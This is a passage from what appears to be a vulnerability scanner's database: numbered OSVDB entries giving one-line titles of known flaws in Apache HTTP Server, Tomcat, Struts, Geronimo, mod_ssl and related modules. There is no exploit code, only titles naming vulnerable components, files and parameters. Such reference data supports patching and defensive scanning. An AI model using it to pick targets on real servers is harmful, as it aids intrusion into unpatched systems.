8554| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
8555| [58667] Apache Roller Database Cleartext Passwords Disclosure
8556| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
8557| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
8558| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
8559| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
8560| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
8561| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
8562| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
8563| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
8564| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
8565| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
8566| [56984] Apache Xerces2 Java Malformed XML Input DoS
8567| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
8568| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
8569| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
8570| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
8571| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
8572| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
8573| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
8574| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
8575| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
8576| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
8577| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
8578| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
8579| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
8580| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
8581| [55056] Apache Tomcat Cross-application TLD File Manipulation
8582| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
8583| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
8584| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
8585| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
8586| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
8587| [54589] Apache Jserv Nonexistent JSP Request XSS
8588| [54122] Apache Struts s:a / s:url Tag href Element XSS
8589| [54093] Apache ActiveMQ Web Console JMS Message XSS
8590| [53932] Apache Geronimo Multiple Admin Function CSRF
8591| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
8592| [53930] Apache Geronimo /console/portal/ URI XSS
8593| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
8594| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
8595| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
8596| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
8597| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
8598| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
8599| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
8600| [53380] Apache Struts Unspecified XSS
8601| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
8602| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
8603| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
8604| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
8605| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
8606| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
8607| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
8608| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
8609| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
8610| [51151] Apache Roller Search Function q Parameter XSS
8611| [50482] PHP with Apache php_value Order Unspecified Issue
8612| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
8613| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
8614| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
8615| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
8616| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
8617| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
8618| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
8619| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
8620| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
8621| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
8622| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
8623| [47096] Oracle Weblogic Apache Connector POST Request Overflow
8624| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
8625| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
8626| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
8627| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
8628| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
8629| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
8630| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
8631| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
8632| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
8633| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
8634| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
8635| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
8636| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
8637| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
8638| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
8639| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
8640| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
8641| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
8642| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
8643| [43452] Apache Tomcat HTTP Request Smuggling
8644| [43309] Apache Geronimo LoginModule Login Method Bypass
8645| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
8646| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
8647| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
8648| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
8649| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
8650| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
8651| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
8652| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
8653| [42091] Apache Maven Site Plugin Installation Permission Weakness
8654| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
8655| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
8656| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
8657| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
8658| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
8659| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
8660| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
8661| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
8662| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
8663| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
8664| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
8665| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
8666| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
8667| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
8668| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
8669| [40262] Apache HTTP Server mod_status refresh XSS
8670| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
8671| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
8672| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
8673| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
8674| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
8675| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
8676| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
8677| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
8678| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
8679| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
8680| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
8681| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
8682| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
8683| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
8684| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
8685| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
8686| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
8687| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
8688| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
8689| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
8690| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
8691| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
8692| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
8693| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
8694| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
8695| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
8696| [36080] Apache Tomcat JSP Examples Crafted URI XSS
8697| [36079] Apache Tomcat Manager Uploaded Filename XSS
8698| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
8699| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
8700| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
8701| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
8702| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
8703| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
8704| [34881] Apache Tomcat Malformed Accept-Language Header XSS
8705| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
8706| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
8707| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
8708| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
8709| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
8710| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
8711| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
8712| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
8713| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
8714| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
8715| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
8716| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
8717| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
8718| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
8719| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
8720| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
8721| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
8722| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
8723| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
8724| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
8725| [32724] Apache mod_python _filter_read Freed Memory Disclosure
8726| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
8727| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
8728| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
8729| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
8730| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
8731| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
8732| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
8733| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
8734| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
8735| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
8736| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
8737| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
8738| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
8739| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
8740| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
8741| [24365] Apache Struts Multiple Function Error Message XSS
8742| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
8743| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
8744| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
8745| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
8746| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
8747| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
8748| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
8749| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
8750| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
8751| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
8752| [22459] Apache Geronimo Error Page XSS
8753| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
8754| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
8755| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
8756| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
8757| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
8758| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
8759| [21021] Apache Struts Error Message XSS
8760| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
8761| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
8762| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
8763| [20439] Apache Tomcat Directory Listing Saturation DoS
8764| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
8765| [20285] Apache HTTP Server Log File Control Character Injection
8766| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
8767| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
8768| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
8769| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
8770| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
8771| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
8772| [19821] Apache Tomcat Malformed Post Request Information Disclosure
8773| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
8774| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
8775| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
8776| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
8777| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
8778| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
8779| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
8780| [18233] Apache HTTP Server htdigest user Variable Overfow
8781| [17738] Apache HTTP Server HTTP Request Smuggling
8782| [16586] Apache HTTP Server Win32 GET Overflow DoS
8783| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
8784| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
8785| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
8786| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
8787| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
8788| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
8789| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
8790| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
8791| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
8792| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
8793| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
8794| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
8795| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
8796| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
8797| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
8798| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
8799| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
8800| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
8801| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
8802| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
8803| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
8804| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
8805| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
8806| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
8807| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
8808| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
8809| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
8810| [13304] Apache Tomcat realPath.jsp Path Disclosure
8811| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
8812| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
8813| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
8814| [12848] Apache HTTP Server htdigest realm Variable Overflow
8815| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
8816| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
8817| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
8818| [12557] Apache HTTP Server prefork MPM accept Error DoS
8819| [12233] Apache Tomcat MS-DOS Device Name Request DoS
8820| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
8821| [12231] Apache Tomcat web.xml Arbitrary File Access
8822| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
8823| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
8824| [12178] Apache Jakarta Lucene results.jsp XSS
8825| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
8826| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
8827| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
8828| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
8829| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
8830| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
8831| [10471] Apache Xerces-C++ XML Parser DoS
8832| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
8833| [10068] Apache HTTP Server htpasswd Local Overflow
8834| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
8835| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
8836| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
8837| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
8838| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
8839| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
8840| [9717] Apache HTTP Server mod_cookies Cookie Overflow
8841| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
8842| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
8843| [9714] Apache Authentication Module Threaded MPM DoS
8844| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
8845| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
8846| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
8847| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
8848| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
8849| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
8850| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
8851| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
8852| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
8853| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
8854| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
8855| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
8856| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
8857| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
8858| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
8859| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
8860| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
8861| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
8862| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
8863| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
8864| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
8865| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
8866| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
8867| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
8868| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
8869| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
8870| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
8871| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
8872| [9208] Apache Tomcat .jsp Encoded Newline XSS
8873| [9204] Apache Tomcat ROOT Application XSS
8874| [9203] Apache Tomcat examples Application XSS
8875| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
8876| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
8877| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
8878| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
8879| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
8880| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
8881| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
8882| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
8883| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
8884| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
8885| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
8886| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
8887| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
8888| [7611] Apache HTTP Server mod_alias Local Overflow
8889| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
8890| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
8891| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
8892| [6882] Apache mod_python Malformed Query String Variant DoS
8893| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
8894| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
8895| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
8896| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
8897| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
8898| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
8899| [5526] Apache Tomcat Long .JSP URI Path Disclosure
8900| [5278] Apache Tomcat web.xml Restriction Bypass
8901| [5051] Apache Tomcat Null Character DoS
8902| [4973] Apache Tomcat servlet Mapping XSS
8903| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
8904| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
8905| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
8906| [4568] mod_survey For Apache ENV Tags SQL Injection
8907| [4553] Apache HTTP Server ApacheBench Overflow DoS
8908| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
8909| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
8910| [4383] Apache HTTP Server Socket Race Condition DoS
8911| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
8912| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
8913| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
8914| [4231] Apache Cocoon Error Page Server Path Disclosure
8915| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
8916| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
8917| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
8918| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
8919| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
8920| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
8921| [3322] mod_php for Apache HTTP Server Process Hijack
8922| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
8923| [2885] Apache mod_python Malformed Query String DoS
8924| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
8925| [2733] Apache HTTP Server mod_rewrite Local Overflow
8926| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
8927| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
8928| [2149] Apache::Gallery Privilege Escalation
8929| [2107] Apache HTTP Server mod_ssl Host: Header XSS
8930| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
8931| [1833] Apache HTTP Server Multiple Slash GET Request DoS
8932| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
8933| [872] Apache Tomcat Multiple Default Accounts
8934| [862] Apache HTTP Server SSI Error Page XSS
8935| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
8936| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
8937| [845] Apache Tomcat MSDOS Device XSS
8938| [844] Apache Tomcat Java Servlet Error Page XSS
8939| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
8940| [838] Apache HTTP Server Chunked Encoding Remote Overflow
8941| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
8942| [775] Apache mod_python Module Importing Privilege Function Execution
8943| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
8944| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
8945| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
8946| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
8947| [637] Apache HTTP Server UserDir Directive Username Enumeration
8948| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
